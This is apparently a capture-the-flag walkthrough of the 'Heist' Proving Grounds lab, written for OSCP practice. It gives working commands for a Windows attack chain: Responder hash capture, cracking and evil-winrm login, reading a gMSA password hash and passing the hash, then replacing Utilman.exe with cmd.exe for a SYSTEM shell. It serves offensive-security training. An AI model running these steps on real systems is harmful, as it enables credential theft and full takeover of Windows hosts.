> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/heist/80.md).

# 80

![](/files/LKdpOwbep2daYNtsHgxE)

![](/files/JM6fBW0m5HFfKvuCsmdZ)

We can try running responder and visiting our ip:

```
sudo responder -I tun0 -A
```

![](/files/uY7CG9U41HfAhNrvHy0N) We get a hash back: ![](/files/aWqXCqasBPGmFlHeC9Vk)

We can crack this with hashcat: ![](/files/d2VJvMn0n4OMfFhNntCz) We got california:

We can login with evil-winrm:

```
evil-winrm -i 192.168.180.165 -u enox -p 'california'
```

We find a todo.txt in desktop of enox: ![](/files/8o1dV0uTQol5UFHbM0yf)

We can check for gmsa with powerview:

```
. .\PowerView.ps1
```

```
Get-ADServiceAccount -Filter * -Properties * | Select SamAccountName,PrincipalsAllowedToRetrieveManagedPassword,msDS-ManagedPasswordInterval,ServicePrincipalNames
```

![](/files/BdKpXwhgRjKBEfthyP3O)

Now we can use GMSAPasswordReader.exe:

```
.\GMSAPasswordReader.exe --accountname 'svc_apache'
```

![](/files/kzvRGjDO4ZKeWB0ADiZX) rc4\_hmac hash is the same as the NT hash.

Now login using evil-winrm:

```
evil-winrm -i 192.168.183.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
```

![](/files/POqP92lLeFJoZyEvxyKC) We have SeRestorePrivilege.

Now using this page: <https://github.com/gtworek/Priv2Admin> ![](/files/2DQPSIIBiCK1eEXSodEy)

```
ren "C:/Windows/System32/Utilman.exe"  Utilman.old
```

```
ren "C:/Windows/System32/cmd.exe" Utilman.exe
```

Now we can get to the lockscreen with rdesktop:

```
rdesktop 192.168.180.254
```

![](/files/8qVGShfKN5nxwd4mCfzM) Now press `win + U` ![](/files/xDYxesLmdsb4FZQiCWHT)

We have nt authority\system. ![](/files/1HHEiGUETLImK43BPQ71)
